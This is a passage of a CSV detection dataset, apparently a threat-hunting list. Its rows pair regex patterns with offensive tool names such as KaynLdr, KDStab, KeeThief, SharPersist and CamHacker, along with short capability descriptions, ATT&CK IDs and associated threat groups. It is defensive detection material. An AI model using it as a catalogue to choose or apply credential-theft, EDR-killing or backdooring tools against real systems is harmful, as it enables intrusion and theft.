correctly checking service and network settings.","T1090 - T1132 - T1046 - T1016","TA0003 - TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/brainfucksec/kalitorify","1","0","N/A","N/A","10","979","219","2024-04-18T07:11:44Z","2016-02-03T20:42:46Z" "*kaluche/bloodhound-quickwin*",".{0,1000}kaluche\/bloodhound\-quickwin.{0,1000}","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/kaluche/bloodhound-quickwin","1","1","AD Enumeration","6","2","185","19","2023-12-18T13:23:10Z","2021-02-16T16:04:16Z" "*kancotdiq/wpaf*",".{0,1000}kancotdiq\/wpaf.{0,1000}","offensive_tool_keyword","wpaf","WordPress admin finder","T1596","TA0007","N/A","N/A","Web Attacks","https://github.com/kancotdiq/wpaf","1","0","N/A","N/A","1","67","14","2018-07-12T04:55:58Z","2018-07-11T18:09:11Z" "*karendm/ADHunt*",".{0,1000}karendm\/ADHunt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*karing.martin+confusercoc@gmail.com*",".{0,1000}karing\.martin\+confusercoc\@gmail\.com.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*Karkas66/CelestialSpark*",".{0,1000}Karkas66\/CelestialSpark.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","1","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*Karmaleon.py*",".{0,1000}Karmaleon\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*karmaSMB.py*",".{0,1000}karmaSMB\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*KasRoudra/CamHacker*",".{0,1000}KasRoudra\/CamHacker.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*kasroudrard@gmail.com*",".{0,1000}kasroudrard\@gmail\.com.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*katoolin*toollist.py*",".{0,1000}katoolin.{0,1000}toollist\.py.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","336","112","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*katoolin3.py*",".{0,1000}katoolin3\.py.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","336","112","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*KatzSystemArchitecture*",".{0,1000}KatzSystemArchitecture.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*KaynInject.x64.exe*",".{0,1000}KaynInject\.x64\.exe.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","1","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*KaynInject.x86.exe*",".{0,1000}KaynInject\.x86\.exe.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","1","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*KAYNINJECT_KAYNINJECT_H*",".{0,1000}KAYNINJECT_KAYNINJECT_H.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*KaynLdr.x64.dll*",".{0,1000}KaynLdr\.x64\.dll.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","1","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*KAYNLDR_KAYNLDR_H*",".{0,1000}KAYNLDR_KAYNLDR_H.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*KaynStrike.x64.bin*",".{0,1000}KaynStrike\.x64\.bin.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*KaynStrike.x64.exe*",".{0,1000}KaynStrike\.x64\.exe.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*KBDPAYLOAD.dll*",".{0,1000}KBDPAYLOAD\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","158","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z" "*KCMTicketFormatter.py*",".{0,1000}KCMTicketFormatter\.py.{0,1000}","offensive_tool_keyword","KCMTicketFormatter","Format SSSD Raw Kerberos Payloads into CCACHE files for use on Windows systems","T1558.003 - T1550.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/blacklanternsecurity/KCMTicketFormatter","1","1","N/A","7","1","36","4","2021-05-26T20:23:56Z","2021-05-26T20:17:33Z" "*KcpPassword.cs*",".{0,1000}KcpPassword\.cs.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","895","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*kdcdump2john.py*",".{0,1000}kdcdump2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*kdstab * /CHECK*",".{0,1000}kdstab\s.{0,1000}\s\/CHECK.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * /CLOSE*",".{0,1000}kdstab\s.{0,1000}\s\/CLOSE.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * /DRIVER*",".{0,1000}kdstab\s.{0,1000}\s\/DRIVER.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * /KILL*",".{0,1000}kdstab\s.{0,1000}\s\/KILL.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * /LIST*",".{0,1000}kdstab\s.{0,1000}\s\/LIST.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * /NAME*",".{0,1000}kdstab\s.{0,1000}\s\/NAME.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * /PID*",".{0,1000}kdstab\s.{0,1000}\s\/PID.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * /SERVICE*",".{0,1000}kdstab\s.{0,1000}\s\/SERVICE.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * /STRIP*",".{0,1000}kdstab\s.{0,1000}\s\/STRIP.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * /UNLOAD*",".{0,1000}kdstab\s.{0,1000}\s\/UNLOAD.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab.cna*",".{0,1000}kdstab\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*KeeFarceReborn.*",".{0,1000}KeeFarceReborn\..{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","N/A","N/A","N/A" "*KeePass config file is backdoored already*",".{0,1000}KeePass\sconfig\sfile\sis\sbackdoored\salready.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*KeePass.sln*",".{0,1000}KeePass\.sln.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","895","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*keepass_common_plug.*",".{0,1000}keepass_common_plug\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*keepass_discover.py*",".{0,1000}keepass_discover\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*keepass2john *.kdbx*",".{0,1000}keepass2john\s.{0,1000}\.kdbx.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*KeePassBackdoor.*",".{0,1000}KeePassBackdoor\..{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*KeePassConfig.ps1*",".{0,1000}KeePassConfig\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While 